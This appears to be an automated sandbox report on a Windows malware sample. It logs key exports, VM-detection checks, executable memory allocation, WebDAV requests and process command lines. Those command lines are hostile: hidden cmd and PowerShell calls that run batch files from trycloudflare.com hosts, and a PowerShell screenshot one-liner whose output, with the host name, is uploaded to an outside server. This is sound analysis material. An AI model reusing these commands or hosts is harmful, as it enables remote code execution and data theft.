WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. console_handle: 0x0000000f	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: ERROR: console_handle: 0x00000007	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. console_handle: 0x00000007	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW April 16, 2025, 11:06 a.m.	buffer: Invalid syntax. /T can be specified only when /D is specified. Type "CHOICE /?" for usage. console_handle: 0x0000000b	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 292 events)

Time & API	Arguments	Status	Return
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b25f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b26f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b26f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b26f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b26f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b26f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b26f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b21b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b21b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b21b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2a78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b22f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2f78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2f78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b1e78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b2878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b2878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b2878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 16, 2025, 11:06 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004b1f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 16, 2025, 11:06 a.m.		1	1	0

Performs some HTTP requests (24 events)

request	PROPFIND https://achievements-plates-station-gaming.trycloudflare.com/32
request	PROPFIND https://achievements-plates-station-gaming.trycloudflare.com/rx.bat
request	GET https://achievements-plates-station-gaming.trycloudflare.com/rx.bat
request	PROPFIND https://achievements-plates-station-gaming.trycloudflare.com/DavWWWRoo
request	PROPFIND https://divide-snow-pound-clip.trycloudflare.com/AutoRun.inf
request	PROPFIND https://characters-contrary-foster-workout.trycloudflare.com/AutoRun.inf
request	PROPFIND https://achievements-plates-station-gaming.trycloudflare.com/final.bat
request	PROPFIND https://characters-contrary-foster-workout.trycloudflare.com/
request	MKCOL https://characters-contrary-foster-workout.trycloudflare.com/test22-PC
request	GET https://achievements-plates-station-gaming.trycloudflare.com/final.bat
request	PROPPATCH https://characters-contrary-foster-workout.trycloudflare.com/test22-PC
request	PROPFIND https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC.txt
request	PUT https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC.txt
request	LOCK https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC.txt
request	PROPPATCH https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC.txt
request	HEAD https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC.txt
request	UNLOCK https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC.txt
request	PROPFIND https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request	PUT https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request	LOCK https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request	PROPPATCH https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request	HEAD https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request	UNLOCK https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/test22-PC_screenshot.png
request	PROPFIND https://characters-contrary-foster-workout.trycloudflare.com/test22-PC/update.bat

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1035 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72712000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 2800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72712000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x720d1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x720d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02772000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02773000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02774000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02792000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02775000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02776000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02793000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02794000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02795000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02796000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02797000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02798000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02799000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cc1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cc2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cc3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cc4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cc5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cc6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cc7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cc8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cc9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ccb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ccc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ccd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cce000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ccf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cd1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 1152 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cd2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW April 16, 2025, 11:06 a.m.	total_number_of_free_bytes: 13322088448 free_bytes_available: 13322088448 root_path: U:\ total_number_of_bytes: 34252779520	1	1	0

Creates a shortcut to an executable file (2 events)

file	C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\DKM-39902004.pdf.lnk

Creates a suspicious process (21 events)

cmdline	powershell -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $screen = [System.Windows.Forms.Screen]::AllScreens[0]; $bitmap = New-Object Drawing.Bitmap $screen.Bounds.Width, $screen.Bounds.Height; $graphics = [System.Drawing.Graphics]::FromImage($bitmap); $graphics.CopyFromScreen($screen.Bounds.Location, [System.Drawing.Point]::Empty, $screen.Bounds.Size); $bitmap.Save('C:\Users\test22\AppData\Local\Temp\test22-PC_screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);"
cmdline	"C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
cmdline	powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/k \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat\" hidden' -WindowStyle Hidden"
cmdline	"C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
cmdline	C:\Windows\System32\cmd.exe /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
cmdline	C:\Windows\system32\cmd.exe /K \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
cmdline	powershell -Command "[System.Net.Dns]::GetHostName()"
cmdline	powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat\" hidden' -WindowStyle Hidden"
